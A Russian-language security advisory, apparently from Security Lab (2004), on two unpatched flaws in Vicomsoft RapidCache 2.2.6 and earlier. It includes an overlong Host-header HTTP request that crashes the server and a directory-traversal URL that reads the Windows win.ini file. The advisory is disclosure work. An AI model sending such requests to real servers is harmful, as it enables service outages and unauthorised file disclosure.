Security Lab

Несколько уязвимостей в RapidCache

Дата публикации:20.01.2004
Всего просмотров:1176
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Отказ в обслуживании
Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Vicomsoft RapidCache Server 2.x
Уязвимые версии: RapidCache 2.2.6 и более ранние версии

Описание: Две уязвимости обнаружены в RapidCache. Удаленный пользователь аварийно завершить работу службы. Удаленный пользователь может также просматривать файлы на системе.

Удаленный пользователь может послать HTTP GET запрос с длинным параметром 'Host', чтобы аварийно завершить работу RapidCache сервера. Пример:

GET / HTTP/1.1
Accept: */*..Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbc cccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddd dddddddddddddddddddddeeeeeeeeeeeeBBBBXXX
X:8080
Connection: Keep-Alive
Также сообщается, что удаленный пользователь может представить специально обработанный URL, содержащий '../', чтобы просмотреть произвольные файлы на системе. Пример:
 http://127.0.0.1:8080/../../../../../../../../windows/win.ini

URL производителя: http://www.vicomsoft.com/rapidcache/rapidcache.main.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: RapidCache Multiple Vulnerabilities